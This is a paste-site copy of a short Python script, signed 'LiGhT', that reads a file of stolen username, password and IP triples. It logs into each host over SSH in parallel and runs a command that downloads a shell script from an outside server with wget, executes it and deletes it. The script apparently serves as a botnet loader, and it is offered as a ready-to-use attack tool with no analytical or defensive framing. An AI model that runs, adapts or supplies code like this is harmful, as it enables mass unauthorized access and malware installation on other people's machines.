SHOW:
|
|
- or go back to the newest paste.
| 1 | #!/usr/bin/python | |
| 2 | #Made By LiGhT | |
| 3 | ||
| 4 | import sys, re, os, paramiko | |
| 5 | from multiprocessing import Process | |
| 6 | ||
| 7 | if len(sys.argv) < 2: | |
| 8 | sys.exit("\033[37mUsage: python "+sys.argv[0]+" [vuln list]")
| |
| 9 | ||
| 10 | paramiko.util.log_to_file("/dev/null")
| |
| 11 | cmd="cd /tmp; wget http://1.1.1.1/gb.sh; sh gb.sh; rm -rf gb.sh" #command to send | |
| 12 | r34d = open(str(sys.argv[1]),'a+') | |
| 13 | print "\033[31mStarting Scan!\n" | |
| 14 | def w0rk(username,password,ip): | |
| 15 | try: | |
| 16 | port = 22 | |
| 17 | ssh = paramiko.SSHClient() | |
| 18 | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) | |
| 19 | ssh.connect(ip, port = port, username=username, password=password, timeout=3) | |
| 20 | print "\033[32m[\033[31m+\033[32m] Command Sent: "+ip+"\033[37m\n" | |
| 21 | ssh.exec_command(""+cmd+"")
| |
| 22 | ssh.close() | |
| 23 | except: | |
| 24 | pass | |
| 25 | for line in r34d: | |
| 26 | ip_1nfo = line.split(":")
| |
| 27 | g0d = Process(target=w0rk, args=(ip_1nfo[0],ip_1nfo[1],ip_1nfo[2],)) | |
| 28 | g0d.start() | |
| 29 | username=ip_1nfo[0] | |
| 30 | password=ip_1nfo[1] | |
| 31 | ip=ip_1nfo[2] | |
| 32 | g0d.join() |